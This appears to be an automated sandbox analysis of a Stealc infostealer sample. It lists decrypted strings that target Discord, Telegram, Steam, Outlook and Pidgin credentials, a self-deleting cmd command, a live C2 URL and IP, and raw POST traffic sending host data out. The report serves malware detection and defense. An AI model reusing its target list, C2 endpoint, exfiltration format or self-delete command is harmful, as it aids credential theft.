Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Running Path:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - CPU:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Threads:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Cores:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - RAM:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: - GPU:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: User Agents:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: All Users:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Current User:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Process List:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: system_info.txt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: nss3.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Temp\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: .exe
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: runas
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: open
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: /c start
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: %RECENT%
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: *.lnk
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: files
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \discord\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: key_datas
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: map*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Telegram
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Tox
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: *.tox
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: *.ini
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Password
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 00000001
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 00000002
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 00000003
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: 00000004
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Pidgin
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \.purple\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: accounts.xml
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: token:
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: SteamPath
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \config\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ssfn*
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: config.vdf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Steam\
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: done
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: soft
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: https
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: POST
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: hwid
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: build
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: token
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: file_name
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: file
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: message
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.X4roU7TtF1.exe.810e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00404C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,VirtualAlloc,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	0_2_00404C50
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_004242C0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_004242C0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_004060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	0_2_004060D0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00407750 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407750
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00409B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409B20
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00409B80 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409B80
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00819D87 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00819D87
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_008179B7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_008179B7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0081EDE7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	0_2_0081EDE7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00819DE7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00819DE7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00826D07 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	0_2_00826D07
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00834527 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00834527
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00814EB7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	0_2_00814EB7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00826F20 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	0_2_00826F20
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00816337 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	0_2_00816337

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Unpacked PE file: 0.2.X4roU7TtF1.exe.400000.0.unpack

Source: X4roU7TtF1.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00823CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00823CD7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_0082D037
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_00821C57
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_0082D987
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	0_2_0082E187
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0081DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_0081DDE7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00811907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_00811907
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00811920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	0_2_00811920
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00824ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00824ED7
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00824EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	0_2_00824EF0
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00821607
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_00821620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	0_2_00821620
Source: C:\Users\user\Desktop\X4roU7TtF1.exe	Code function: 0_2_0082E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	0_2_0082E657

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49707 -> 92.255.57.88:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://92.255.57.88/7bbacc20a3bd2eb5.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.88Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /7bbacc20a3bd2eb5.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBKKKFHCFIDHIECGCAFHost: 92.255.57.88Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 39 39 38 44 43 33 30 32 33 31 38 31 37 37 30 34 35 37 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 35 35 31 34 38 38 34 31 31 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 4b 4b 4b 46 48 43 46 49 44 48 49 45 43 47 43 41 46 2d 2d 0d 0a Data Ascii: ------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="hwid"376998DC30231817704571------ECBKKKFHCFIDHIECGCAFContent-Disposition: form-data; name="build"551488411------ECBKKKFHCFIDHIECGCAF--

Source: Joe Sandbox View

ASN Name: TELSPRU TELSPRU

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.88

Source: C:\Users\user\Desktop\X4roU7TtF1.exe

Code function: 0_2_00406C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,

0_2_00406C40

Source: global traffic

